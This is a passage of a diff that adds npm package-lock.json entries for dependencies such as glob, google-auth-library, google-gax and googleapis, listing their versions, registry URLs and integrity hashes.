"sha512-r1ekGw/Bgpi3HLV3h1MRBIlSAdHoIMklpaQ3OQLFcRw9PwAj2rqigvIbg+dBUI51OxVI2jsEtDywDBjSiuf7Ug==", + "dev": true, + "license": "MIT", + "dependencies": { + "citty": "^0.1.6", + "consola": "^3.4.0", + "defu": "^6.1.4", + "node-fetch-native": "^1.6.6", + "nypm": "^0.5.4", + "pathe": "^2.0.3", + "tar": "^6.2.1" + }, + "bin": { + "giget": "dist/cli.mjs" + } + }, + "node_modules/glob": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/glob/-/glob-7.2.0.tgz", + "integrity": "sha512-lmLf6gtyrPq8tTjSmrO94wBeQbFR3HbLHbuyD69wuyQkImp2hWqMGB47OX65FBkPffO641IP9jWa1z4ivqG26Q==", + "dependencies": { + "fs.realpath": "^1.0.0", + "inflight": "^1.0.4", + "inherits": "2", + "minimatch": "^3.0.4", + "once": "^1.3.0", + "path-is-absolute": "^1.0.0" + }, + "engines": { + "node": "*" + }, + "funding": { + "url": "https://github.com/sponsors/isaacs" + } + }, + "node_modules/glob-parent": { + "version": "5.1.2", + "resolved": "https://registry.npmjs.org/glob-parent/-/glob-parent-5.1.2.tgz", + "integrity": "sha512-AOIgSQCepiJYwP3ARnGx+5VnTu2HBYdzbGP45eLw1vr3zB3vZLeyed1sC9hnbcOc9/SrMyM5RPQrkGz4aS9Zow==", + "dev": true, + "dependencies": { + "is-glob": "^4.0.1" + }, + "engines": { + "node": ">= 6" + } + }, + "node_modules/glob-stream": { + "version": "8.0.0", + "resolved": "https://registry.npmjs.org/glob-stream/-/glob-stream-8.0.0.tgz", + "integrity": "sha512-CdIUuwOkYNv9ZadR3jJvap8CMooKziQZ/QCSPhEb7zqfsEI5YnPmvca7IvbaVE3z58ZdUYD2JsU6AUWjL8WZJA==", + "dev": true, + "dependencies": { + "@gulpjs/to-absolute-glob": "^4.0.0", + "anymatch": "^3.1.3", + "fastq": "^1.13.0", + "glob-parent": "^6.0.2", + "is-glob": "^4.0.3", + "is-negated-glob": "^1.0.0", + "normalize-path": "^3.0.0", + "streamx": "^2.12.5" + }, + "engines": { + "node": ">=10.13.0" + } + }, + "node_modules/glob-stream/node_modules/glob-parent": { + "version": "6.0.2", + "resolved": "https://registry.npmjs.org/glob-parent/-/glob-parent-6.0.2.tgz", + "integrity": "sha512-XxwI8EOhVQgWp6iDL+3b0r86f4d6AX6zSU55HfB4ydCEuXLXc5FcYeOu+nnGftS4TEju/11rt4KJPTMgbfmv4A==", + "dev": true, + "dependencies": { + "is-glob": "^4.0.3" + }, + "engines": { + "node": ">=10.13.0" + } + }, + "node_modules/glob-to-regexp": { + "version": "0.4.1", + "resolved": "https://registry.npmjs.org/glob-to-regexp/-/glob-to-regexp-0.4.1.tgz", + "integrity": "sha512-lkX1HJXwyMcprw/5YUZc2s7DrpAiHB21/V+E1rHUrVNokkvB6bqMzT0VfV6/86ZNabt1k14YOIaT7nDvOX3Iiw==", + "dev": true + }, + "node_modules/global": { + "version": "4.4.0", + "resolved": "https://registry.npmjs.org/global/-/global-4.4.0.tgz", + "integrity": "sha512-wv/LAoHdRE3BeTGz53FAamhGlPLhlssK45usmGFThIi4XqnBmjKQ16u+RNbP7WvigRZDxUsM0J3gcQ5yicaL0w==", + "dev": true, + "dependencies": { + "min-document": "^2.19.0", + "process": "^0.11.10" + } + }, + "node_modules/global-dirs": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/global-dirs/-/global-dirs-3.0.0.tgz", + "integrity": "sha512-v8ho2DS5RiCjftj1nD9NmnfaOzTdud7RRnVd9kFNOjqZbISlx5DQ+OrTkywgd0dIt7oFCvKetZSHoHcP3sDdiA==", + "dev": true, + "dependencies": { + "ini": "2.0.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/global-dirs/node_modules/ini": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/ini/-/ini-2.0.0.tgz", + "integrity": "sha512-7PnF4oN3CvZF23ADhA5wRaYEQpJ8qygSkbtTXWBeXWXmEVRXK+1ITciHWwHhsjv1TmW0MgacIv6hEi5pX5NQdA==", + "dev": true, + "engines": { + "node": ">=10" + } + }, + "node_modules/global-modules": { + "version": "2.0.0", + "resolved": 
"https://registry.npmjs.org/global-modules/-/global-modules-2.0.0.tgz", + "integrity": "sha512-NGbfmJBp9x8IxyJSd1P+otYK8vonoJactOogrVfFRIAEY1ukil8RSKDz2Yo7wh1oihl51l/r6W4epkeKJHqL8A==", + "dev": true, + "peer": true, + "dependencies": { + "global-prefix": "^3.0.0" + }, + "engines": { + "node": ">=6" + } + }, + "node_modules/global-prefix": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/global-prefix/-/global-prefix-3.0.0.tgz", + "integrity": "sha512-awConJSVCHVGND6x3tmMaKcQvwXLhjdkmomy2W+Goaui8YPgYgXJZewhg3fWC+DlfqqQuWg8AwqjGTD2nAPVWg==", + "dev": true, + "peer": true, + "dependencies": { + "ini": "^1.3.5", + "kind-of": "^6.0.2", + "which": "^1.3.1" + }, + "engines": { + "node": ">=6" + } + }, + "node_modules/global-prefix/node_modules/which": { + "version": "1.3.1", + "resolved": "https://registry.npmjs.org/which/-/which-1.3.1.tgz", + "integrity": "sha512-HxJdYWq1MTIQbJ3nw0cqssHoTNU267KlrDuGZ1WYlxDStUtKUhOaJmh112/TZmHxxUfuJqPXSOm7tDyas0OSIQ==", + "dev": true, + "peer": true, + "dependencies": { + "isexe": "^2.0.0" + }, + "bin": { + "which": "bin/which" + } + }, + "node_modules/globals": { + "version": "11.12.0", + "resolved": "https://registry.npmjs.org/globals/-/globals-11.12.0.tgz", + "integrity": "sha512-WOBp/EEGUiIsJSp7wcv/y6MO+lV9UoncWqxuFfm8eBwzWNgyfBd6Gz+IeKQ9jCmyhoH99g15M3T+QaVHFjizVA==", + "dev": true, + "engines": { + "node": ">=4" + } + }, + "node_modules/globalthis": { + "version": "1.0.3", + "resolved": "https://registry.npmjs.org/globalthis/-/globalthis-1.0.3.tgz", + "integrity": "sha512-sFdI5LyBiNTHjRd7cGPWapiHWMOXKyuBNX/cWJ3NfzrZQVa8GI/8cofCl74AOVqq9W5kNmguTIzJ/1s2gyI9wA==", + "dependencies": { + "define-properties": "^1.1.3" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/globby": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/globby/-/globby-5.0.0.tgz", + "integrity": "sha1-69hGZ8oNuzMLmbz8aOrCvFQ3Dg0=", + "dependencies": { + "array-union": "^1.0.1", + "arrify": "^1.0.0", + "glob": "^7.0.3", + "object-assign": "^4.0.1", + "pify": "^2.0.0", + "pinkie-promise": "^2.0.0" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/globby/node_modules/arrify": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/arrify/-/arrify-1.0.1.tgz", + "integrity": "sha1-iYUI2iIm84DfkEcoRWhJwVAaSw0=", + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/globjoin": { + "version": "0.1.4", + "resolved": "https://registry.npmjs.org/globjoin/-/globjoin-0.1.4.tgz", + "integrity": "sha512-xYfnw62CKG8nLkZBfWbhWwDw02CHty86jfPcc2cr3ZfeuK9ysoVPPEUxf21bAD/rWAgk52SuBrLJlefNy8mvFg==", + "dev": true, + "peer": true + }, + "node_modules/google-auth-library": { + "version": "7.14.1", + "resolved": "https://registry.npmjs.org/google-auth-library/-/google-auth-library-7.14.1.tgz", + "integrity": "sha512-5Rk7iLNDFhFeBYc3s8l1CqzbEBcdhwR193RlD4vSNFajIcINKI8W8P0JLmBpwymHqqWbX34pJDQu39cSy/6RsA==", + "dependencies": { + "arrify": "^2.0.0", + "base64-js": "^1.3.0", + "ecdsa-sig-formatter": "^1.0.11", + "fast-text-encoding": "^1.0.0", + "gaxios": "^4.0.0", + "gcp-metadata": "^4.2.0", + "gtoken": "^5.0.4", + "jws": "^4.0.0", + "lru-cache": "^6.0.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/google-auth-library/node_modules/gaxios": { + "version": "4.3.2", + "resolved": "https://registry.npmjs.org/gaxios/-/gaxios-4.3.2.tgz", + "integrity": "sha512-T+ap6GM6UZ0c4E6yb1y/hy2UB6hTrqhglp3XfmU9qbLCGRYhLVV5aRPpC4EmoG8N8zOnkYCgoBz+ScvGAARY6Q==", + 
"dependencies": { + "abort-controller": "^3.0.0", + "extend": "^3.0.2", + "https-proxy-agent": "^5.0.0", + "is-stream": "^2.0.0", + "node-fetch": "^2.6.1" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/google-auth-library/node_modules/gcp-metadata": { + "version": "4.3.1", + "resolved": "https://registry.npmjs.org/gcp-metadata/-/gcp-metadata-4.3.1.tgz", + "integrity": "sha512-x850LS5N7V1F3UcV7PoupzGsyD6iVwTVvsh3tbXfkctZnBnjW5yu5z1/3k3SehF7TyoTIe78rJs02GMMy+LF+A==", + "dependencies": { + "gaxios": "^4.0.0", + "json-bigint": "^1.0.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/google-auth-library/node_modules/lru-cache": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", + "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", + "dependencies": { + "yallist": "^4.0.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/google-auth-library/node_modules/yallist": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", + "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==" + }, + "node_modules/google-gax": { + "version": "4.3.5", + "resolved": "https://registry.npmjs.org/google-gax/-/google-gax-4.3.5.tgz", + "integrity": "sha512-zXRSGgHp33ottCQMdYlKEFX/MhWkzKVX5P3Vpmx+DW6rtseLILzp3V0YV5Rh4oQzzkM0BH9+nJIyX01EUgmd3g==", + "dependencies": { + "@grpc/grpc-js": "~1.10.3", + "@grpc/proto-loader": "^0.7.0", + "@types/long": "^4.0.0", + "abort-controller": "^3.0.0", + "duplexify": "^4.0.0", + "google-auth-library": "^9.3.0", + "node-fetch": "^2.6.1", + "object-hash": "^3.0.0", + "proto3-json-serializer": "^2.0.0", + "protobufjs": "7.3.0", + "retry-request": "^7.0.0", + "uuid": "^9.0.1" + }, + "engines": { + "node": ">=14" + } + }, + "node_modules/google-gax/node_modules/@grpc/grpc-js": { + "version": "1.10.11", + "resolved": "https://registry.npmjs.org/@grpc/grpc-js/-/grpc-js-1.10.11.tgz", + "integrity": "sha512-3RaoxOqkHHN2c05bwtBNVJmOf/UwMam0rZYtdl7dsRpsvDwcNpv6LkGgzltQ7xVf822LzBoKEPRvf4D7+xeIDw==", + "dependencies": { + "@grpc/proto-loader": "^0.7.13", + "@js-sdsl/ordered-map": "^4.4.2" + }, + "engines": { + "node": ">=12.10.0" + } + }, + "node_modules/google-gax/node_modules/agent-base": { + "version": "7.1.1", + "resolved": "https://registry.npmjs.org/agent-base/-/agent-base-7.1.1.tgz", + "integrity": "sha512-H0TSyFNDMomMNJQBn8wFV5YC/2eJ+VXECwOadZJT554xP6cODZHPX3H9QMQECxvrgiSOP1pHjy1sMWQVYJOUOA==", + "dependencies": { + "debug": "^4.3.4" + }, + "engines": { + "node": ">= 14" + } + }, + "node_modules/google-gax/node_modules/debug": { + "version": "4.3.5", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.5.tgz", + "integrity": "sha512-pt0bNEmneDIvdL1Xsd9oDQ/wrQRkXDT4AUWlNZNPKvW5x/jyO9VFXkJUP07vQ2upmw5PlaITaPKc31jK13V+jg==", + "dependencies": { + "ms": "2.1.2" + }, + "engines": { + "node": ">=6.0" + }, + "peerDependenciesMeta": { + "supports-color": { + "optional": true + } + } + }, + "node_modules/google-gax/node_modules/duplexify": { + "version": "4.1.2", + "resolved": "https://registry.npmjs.org/duplexify/-/duplexify-4.1.2.tgz", + "integrity": "sha512-fz3OjcNCHmRP12MJoZMPglx8m4rrFP8rovnk4vT8Fs+aonZoCwGg10dSsQsfP/E62eZcPTMSMP6686fu9Qlqtw==", + "dependencies": { + "end-of-stream": "^1.4.1", + "inherits": "^2.0.3", + "readable-stream": "^3.1.1", + "stream-shift": "^1.0.0" + } + }, + "node_modules/google-gax/node_modules/gaxios": { + "version": 
"6.6.0", + "resolved": "https://registry.npmjs.org/gaxios/-/gaxios-6.6.0.tgz", + "integrity": "sha512-bpOZVQV5gthH/jVCSuYuokRo2bTKOcuBiVWpjmTn6C5Agl5zclGfTljuGsQZxwwDBkli+YhZhP4TdlqTnhOezQ==", + "dependencies": { + "extend": "^3.0.2", + "https-proxy-agent": "^7.0.1", + "is-stream": "^2.0.0", + "node-fetch": "^2.6.9", + "uuid": "^9.0.1" + }, + "engines": { + "node": ">=14" + } + }, + "node_modules/google-gax/node_modules/gcp-metadata": { + "version": "6.1.0", + "resolved": "https://registry.npmjs.org/gcp-metadata/-/gcp-metadata-6.1.0.tgz", + "integrity": "sha512-Jh/AIwwgaxan+7ZUUmRLCjtchyDiqh4KjBJ5tW3plBZb5iL/BPcso8A5DlzeD9qlw0duCamnNdpFjxwaT0KyKg==", + "dependencies": { + "gaxios": "^6.0.0", + "json-bigint": "^1.0.0" + }, + "engines": { + "node": ">=14" + } + }, + "node_modules/google-gax/node_modules/google-auth-library": { + "version": "9.10.0", + "resolved": "https://registry.npmjs.org/google-auth-library/-/google-auth-library-9.10.0.tgz", + "integrity": "sha512-ol+oSa5NbcGdDqA+gZ3G3mev59OHBZksBTxY/tYwjtcp1H/scAFwJfSQU9/1RALoyZ7FslNbke8j4i3ipwlyuQ==", + "dependencies": { + "base64-js": "^1.3.0", + "ecdsa-sig-formatter": "^1.0.11", + "gaxios": "^6.1.1", + "gcp-metadata": "^6.1.0", + "gtoken": "^7.0.0", + "jws": "^4.0.0" + }, + "engines": { + "node": ">=14" + } + }, + "node_modules/google-gax/node_modules/gtoken": { + "version": "7.1.0", + "resolved": "https://registry.npmjs.org/gtoken/-/gtoken-7.1.0.tgz", + "integrity": "sha512-pCcEwRi+TKpMlxAQObHDQ56KawURgyAf6jtIY046fJ5tIv3zDe/LEIubckAO8fj6JnAxLdmWkUfNyulQ2iKdEw==", + "dependencies": { + "gaxios": "^6.0.0", + "jws": "^4.0.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/google-gax/node_modules/https-proxy-agent": { + "version": "7.0.4", + "resolved": "https://registry.npmjs.org/https-proxy-agent/-/https-proxy-agent-7.0.4.tgz", + "integrity": "sha512-wlwpilI7YdjSkWaQ/7omYBMTliDcmCN8OLihO6I9B86g06lMyAoqgoDpV0XqoaPOKj+0DIdAvnsWfyAAhmimcg==", + "dependencies": { + "agent-base": "^7.0.2", + "debug": "4" + }, + "engines": { + "node": ">= 14" + } + }, + "node_modules/google-gax/node_modules/ms": { + "version": "2.1.2", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", + "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==" + }, + "node_modules/google-gax/node_modules/object-hash": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/object-hash/-/object-hash-3.0.0.tgz", + "integrity": "sha512-RSn9F68PjH9HqtltsSnqYC1XXoWe9Bju5+213R98cNGttag9q9yAOTzdbsqvIa7aNm5WffBZFpWYr2aWrklWAw==", + "engines": { + "node": ">= 6" + } + }, + "node_modules/google-gax/node_modules/proto3-json-serializer": { + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/proto3-json-serializer/-/proto3-json-serializer-2.0.2.tgz", + "integrity": "sha512-SAzp/O4Yh02jGdRc+uIrGoe87dkN/XtwxfZ4ZyafJHymd79ozp5VG5nyZ7ygqPM5+cpLDjjGnYFUkngonyDPOQ==", + "dependencies": { + "protobufjs": "^7.2.5" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/google-gax/node_modules/protobufjs": { + "version": "7.3.0", + "resolved": "https://registry.npmjs.org/protobufjs/-/protobufjs-7.3.0.tgz", + "integrity": "sha512-YWD03n3shzV9ImZRX3ccbjqLxj7NokGN0V/ESiBV5xWqrommYHYiihuIyavq03pWSGqlyvYUFmfoMKd+1rPA/g==", + "hasInstallScript": true, + "dependencies": { + "@protobufjs/aspromise": "^1.1.2", + "@protobufjs/base64": "^1.1.2", + "@protobufjs/codegen": "^2.0.4", + "@protobufjs/eventemitter": "^1.1.0", + "@protobufjs/fetch": "^1.1.0", + "@protobufjs/float": "^1.0.2", + 
"@protobufjs/inquire": "^1.1.0", + "@protobufjs/path": "^1.1.2", + "@protobufjs/pool": "^1.1.0", + "@protobufjs/utf8": "^1.1.0", + "@types/node": ">=13.7.0", + "long": "^5.0.0" + }, + "engines": { + "node": ">=12.0.0" + } + }, + "node_modules/google-gax/node_modules/retry-request": { + "version": "7.0.2", + "resolved": "https://registry.npmjs.org/retry-request/-/retry-request-7.0.2.tgz", + "integrity": "sha512-dUOvLMJ0/JJYEn8NrpOaGNE7X3vpI5XlZS/u0ANjqtcZVKnIxP7IgCFwrKTxENw29emmwug53awKtaMm4i9g5w==", + "dependencies": { + "@types/request": "^2.48.8", + "extend": "^3.0.2", + "teeny-request": "^9.0.0" + }, + "engines": { + "node": ">=14" + } + }, + "node_modules/google-gax/node_modules/teeny-request": { + "version": "9.0.0", + "resolved": "https://registry.npmjs.org/teeny-request/-/teeny-request-9.0.0.tgz", + "integrity": "sha512-resvxdc6Mgb7YEThw6G6bExlXKkv6+YbuzGg9xuXxSgxJF7Ozs+o8Y9+2R3sArdWdW8nOokoQb1yrpFB0pQK2g==", + "dependencies": { + "http-proxy-agent": "^5.0.0", + "https-proxy-agent": "^5.0.0", + "node-fetch": "^2.6.9", + "stream-events": "^1.0.5", + "uuid": "^9.0.0" + }, + "engines": { + "node": ">=14" + } + }, + "node_modules/google-gax/node_modules/teeny-request/node_modules/agent-base": { + "version": "6.0.2", + "resolved": "https://registry.npmjs.org/agent-base/-/agent-base-6.0.2.tgz", + "integrity": "sha512-RZNwNclF7+MS/8bDg70amg32dyeZGZxiDuQmZxKLAlQjr3jGyLx+4Kkk58UO7D2QdgFIQCovuSuZESne6RG6XQ==", + "dependencies": { + "debug": "4" + }, + "engines": { + "node": ">= 6.0.0" + } + }, + "node_modules/google-gax/node_modules/teeny-request/node_modules/https-proxy-agent": { + "version": "5.0.1", + "resolved": "https://registry.npmjs.org/https-proxy-agent/-/https-proxy-agent-5.0.1.tgz", + "integrity": "sha512-dFcAjpTQFgoLMzC2VwU+C/CbS7uRL0lWmxDITmqm7C+7F0Odmj6s9l6alZc6AELXhrnggM2CeWSXHGOdX2YtwA==", + "dependencies": { + "agent-base": "6", + "debug": "4" + }, + "engines": { + "node": ">= 6" + } + }, + "node_modules/google-gax/node_modules/uuid": { + "version": "9.0.1", + "resolved": "https://registry.npmjs.org/uuid/-/uuid-9.0.1.tgz", + "integrity": "sha512-b+1eJOlsR9K8HJpow9Ok3fiWOWSIcIzXodvv0rQjVoOVNpWMpxf1wZNpt4y9h10odCNrqnYp1OBzRktckBe3sA==", + "funding": [ + "https://github.com/sponsors/broofa", + "https://github.com/sponsors/ctavan" + ], + "bin": { + "uuid": "dist/bin/uuid" + } + }, + "node_modules/google-p12-pem": { + "version": "3.1.3", + "resolved": "https://registry.npmjs.org/google-p12-pem/-/google-p12-pem-3.1.3.tgz", + "integrity": "sha512-MC0jISvzymxePDVembypNefkAQp+DRP7dBE+zNUPaIjEspIlYg0++OrsNr248V9tPbz6iqtZ7rX1hxWA5B8qBQ==", + "dependencies": { + "node-forge": "^1.0.0" + }, + "bin": { + "gp12-pem": "build/src/bin/gp12-pem.js" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/google-proto-files": { + "version": "3.0.3", + "resolved": "https://registry.npmjs.org/google-proto-files/-/google-proto-files-3.0.3.tgz", + "integrity": "sha512-7JaU/smPA/FpNsCaXyVjitwiQyn5zYC/ETA+xag3ziovBojIWvzevyrbVqhxgnQdgMJ0p1RVSvpzQL6hkg6yGw==", + "dependencies": { + "protobufjs": "^7.0.0", + "walkdir": "^0.4.0" + }, + "engines": { + "node": ">=12.0.0" + } + }, + "node_modules/googleapis": { + "version": "118.0.0", + "resolved": "https://registry.npmjs.org/googleapis/-/googleapis-118.0.0.tgz", + "integrity": "sha512-Ny6zJOGn5P/YDT6GQbJU6K0lSzEu4Yuxnsn45ZgBIeSQ1RM0FolEjUToLXquZd89DU9wUfqA5XYHPEctk1TFWg==", + "dependencies": { + "google-auth-library": "^8.0.2", + "googleapis-common": "^6.0.0" + }, + "engines": { + "node": ">=12.0.0" + } + }, + "node_modules/googleapis-common": { + 
"version": "6.0.4", + "resolved": "https://registry.npmjs.org/googleapis-common/-/googleapis-common-6.0.4.tgz", + "integrity": "sha512-m4ErxGE8unR1z0VajT6AYk3s6a9gIMM6EkDZfkPnES8joeOlEtFEJeF8IyZkb0tjPXkktUfYrE4b3Li1DNyOwA==", + "dependencies": { + "extend": "^3.0.2", + "gaxios": "^5.0.1", + "google-auth-library": "^8.0.2", + "qs": "^6.7.0", + "url-template": "^2.0.8", + "uuid": "^9.0.0" + }, + "engines": { + "node": ">=12.0.0" + } + }, + "node_modules/googleapis-common/node_modules/google-auth-library": { + "version": "8.8.0", + "resolved": "https://registry.npmjs.org/google-auth-library/-/google-auth-library-8.8.0.tgz", + "integrity": "sha512-0iJn7IDqObDG5Tu9Tn2WemmJ31ksEa96IyK0J0OZCpTh6CrC6FrattwKX87h3qKVuprCJpdOGKc1Xi8V0kMh8Q==", + "dependencies": { + "arrify": "^2.0.0", + "base64-js": "^1.3.0", + "ecdsa-sig-formatter": "^1.0.11", + "fast-text-encoding": "^1.0.0", + "gaxios": "^5.0.0", + "gcp-metadata": "^5.2.0", + "gtoken": "^6.1.0", + "jws": "^4.0.0", + "lru-cache": "^6.0.0" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/googleapis-common/node_modules/google-p12-pem": { + "version": "4.0.1", + "resolved": "https://registry.npmjs.org/google-p12-pem/-/google-p12-pem-4.0.1.tgz", + "integrity": "sha512-WPkN4yGtz05WZ5EhtlxNDWPhC4JIic6G8ePitwUWy4l+XPVYec+a0j0Ts47PDtW59y3RwAhUd9/h9ZZ63px6RQ==", + "dependencies": { + "node-forge": "^1.3.1" + }, + "bin": { + "gp12-pem": "build/src/bin/gp12-pem.js" + }, + "engines": { + "node": ">=12.0.0" + } + }, + "node_modules/googleapis-common/node_modules/gtoken": { + "version": "6.1.2", + "resolved": "https://registry.npmjs.org/gtoken/-/gtoken-6.1.2.tgz", + "integrity": "sha512-4ccGpzz7YAr7lxrT2neugmXQ3hP9ho2gcaityLVkiUecAiwiy60Ii8gRbZeOsXV19fYaRjgBSshs8kXw+NKCPQ==", + "dependencies": { + "gaxios": "^5.0.1", + "google-p12-pem": "^4.0.0", + "jws": "^4.0.0" + }, + "engines": { + "node": ">=12.0.0" + } + }, + "node_modules/googleapis-common/node_modules/lru-cache": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", + "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", + "dependencies": { + "yallist": "^4.0.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/googleapis-common/node_modules/uuid": { + "version": "9.0.0", + "resolved": "https://registry.npmjs.org/uuid/-/uuid-9.0.0.tgz", + "integrity": "sha512-MXcSTerfPa4uqyzStbRoTgt5XIe3x5+42+q1sDuy3R5MDk66URdLMOZe5aPX/SQd+kuYAh0FdP/pO28IkQyTeg==", + "bin": { + "uuid": "dist/bin/uuid" + } + }, + "node_modules/googleapis-common/node_modules/yallist": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", + "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==" + }, + "node_modules/googleapis/node_modules/google-auth-library": { + "version": "8.8.0", + "resolved": "https://registry.npmjs.org/google-auth-library/-/google-auth-library-8.8.0.tgz", + "integrity": "sha512-0iJn7IDqObDG5Tu9Tn2WemmJ31ksEa96IyK0J0OZCpTh6CrC6FrattwKX87h3qKVuprCJpdOGKc1Xi8V0kMh8Q==", + "dependencies": { + "arrify": "^2.0.0", + "base64-js": "^1.3.0", + "ecdsa-sig-formatter": "^1.0.11", + "fast-text-encoding": "^1.0.0", + "gaxios": "^5.0.0", + "gcp-metadata": "^5.2.0", + "gtoken": "^6.1.0", + "jws": "^4.0.0", + "lru-cache": "^6.0.0" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/googleapis/node_modules/google-p12-pem": { + "version": "4.0.1", + "resolved": 
"https://registry.npmjs.org/google-p12-pem/-/google-p12-pem-4.0.1.tgz", + "integrity": "sha512-WPkN4yGtz05WZ5EhtlxNDWPhC4JIic6G8ePitwUWy4l+XPVYec+a0j0Ts47PDtW59y3RwAhUd9/h9ZZ63px6RQ==", + "dependencies": { + "node-forge": "^1.3.1" + }, + "bin": { + "gp12-pem": "build/src/bin/gp12-pem.js" + }, + "engines": { + "node": ">=12.0.0" + } + }, + "node_modules/googleapis/node_modules/gtoken": { + "version": "6.1.2", + "resolved": "https://registry.npmjs.org/gtoken/-/gtoken-6.1.2.tgz", + "integrity": "sha512-4ccGpzz7YAr7lxrT2neugmXQ3hP9ho2gcaityLVkiUecAiwiy60Ii8gRbZeOsXV19fYaRjgBSshs8kXw+NKCPQ==", + "dependencies": { + "gaxios": "^5.0.1", + "google-p12-pem": "^4.0.0", + "jws": "^4.0.0" + }, + "engines": { + "node": ">=12.0.0" + } + }, + "node_modules/googleapis/node_modules/lru-cache": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", + "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", + "dependencies": { + "yallist": "^4.0.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/googleapis/node_modules/yallist": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", + "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==" + }, + "node_modules/gopd": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/gopd/-/gopd-1.0.1.tgz", + "integrity": "sha512-d65bNlIadxvpb/A2abVdlqKqV563juRnZ1Wtk6s1sIR8uNsXR70xqIzVqxVf1eTqDunwT2MkczEeaezCKTZhwA==", + "dependencies": { + "get-intrinsic": "^1.1.3" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/graceful-fs": { + "version": "4.2.11", + "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-4.2.11.tgz", + "integrity": "sha512-RbJ5/jmFcNNCcDV5o9eTnBLJ/HszWV0P73bc+Ff4nS/rJj+YaS6IGyiOL0VoBYX+l1Wrl3k63h/KrH+nhJ0XvQ==" + }, + "node_modules/graphemer": { + "version": "1.4.0", + "resolved": "https://registry.npmjs.org/graphemer/-/graphemer-1.4.0.tgz", + "integrity": "sha512-EtKwoO6kxCL9WO5xipiHTZlSzBm7WLT627TqC/uVRd0HKmq8NXyebnNYxDoBi7wt8eTWrUrKXCOVaFq9x1kgag==" + }, + "node_modules/graphlib": { + "version": "2.1.8", + "resolved": "https://registry.npmjs.org/graphlib/-/graphlib-2.1.8.tgz", + "integrity": "sha512-jcLLfkpoVGmH7/InMC/1hIvOPSUh38oJtGhvrOFGzioE1DZ+0YW16RgmOJhHiuWTvGiJQ9Z1Ik43JvkRPRvE+A==", + "dependencies": { + "lodash": "^4.17.15" + } + }, + "node_modules/gtoken": { + "version": "5.3.1", + "resolved": "https://registry.npmjs.org/gtoken/-/gtoken-5.3.1.tgz", + "integrity": "sha512-yqOREjzLHcbzz1UrQoxhBtpk8KjrVhuqPE7od1K2uhyxG2BHjKZetlbLw/SPZak/QqTIQW+addS+EcjqQsZbwQ==", + "dependencies": { + "gaxios": "^4.0.0", + "google-p12-pem": "^3.0.3", + "jws": "^4.0.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/gtoken/node_modules/gaxios": { + "version": "4.3.2", + "resolved": "https://registry.npmjs.org/gaxios/-/gaxios-4.3.2.tgz", + "integrity": "sha512-T+ap6GM6UZ0c4E6yb1y/hy2UB6hTrqhglp3XfmU9qbLCGRYhLVV5aRPpC4EmoG8N8zOnkYCgoBz+ScvGAARY6Q==", + "dependencies": { + "abort-controller": "^3.0.0", + "extend": "^3.0.2", + "https-proxy-agent": "^5.0.0", + "is-stream": "^2.0.0", + "node-fetch": "^2.6.1" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/gulp-sort": { + "version": "2.0.0", + "resolved": 